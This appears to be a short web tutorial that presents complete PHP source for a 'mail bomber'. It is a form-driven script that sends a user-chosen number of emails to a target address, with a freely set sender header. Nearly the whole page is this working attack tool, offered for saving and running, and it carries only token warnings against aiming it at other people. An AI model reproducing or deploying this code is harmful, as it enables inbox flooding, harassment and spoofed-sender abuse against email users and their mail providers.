| Email - Mail Bomber Send | | Print | |
What is mail bomber?
mail bomber is flooding mail send. this also fully your inbox over 10.000 mail.
so, don't give this mail bomb to other mail.
Code of mail bomber is:
<?
if (isset($_POST['sendbomb'])) {
for ($i = 1; $i <= 5000; $i++) {
$xx = "s";
$xx .= "$i";
$$xx = $_POST[$xx];
}
/* Email for blocked from this mail boomber */
$block = "
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
";
/* Check if he person is using the filtered emails */
if(!preg_match("!$block!i",$s1)) {
/* If There was no errors */
/* Set The Mailto And Subject Variables */
$MailTo = "$s2";
$MailSubject = "$s3";
/* Remove funny chars from the email so i'm doesnt go to i'm */
$s4 = stripslashes($s4);
$MailBody = "$s4";
/* Send Email Bomb !! */
for ($i = 1; $i <= $s5; $i++) {
mail($MailTo, $MailSubject, $MailBody, "From: $s1<$s1>
X-Mailer: PHP/" . phpversion());
}
/* echo out that the email bomb was sent */
echo "Mail Boomber Success";
}
else {
/* if the email was blocked give this error message */
echo "Don't Boom My Email";
}
}
else {
?>
<form action="<? echo $_SERVER['REQUEST_URI']; ?>" method="POST" class="style2">
<input type="text" name="s1" size="18">
<br>
Send To:
<br />
<input type="text" name="s2" size="18">
<br>
Subject :
<br />
<input type="text" name="s3" size="18">
<br>
Amount To Send :
<br />
<input type="text" name="s5" size="18">
<br>
Enter a Message:
<br>
<textarea name="s4" cols="50" rows="5"></textarea>
<br >
<input type="submit" value="Send Bomb" name="sendbomb">
</form>
<?
}
?>
Save the code on bomb.php
Don't try to other mail, please try to your else mail.
| Users' Comments (0) |
|
No comment posted




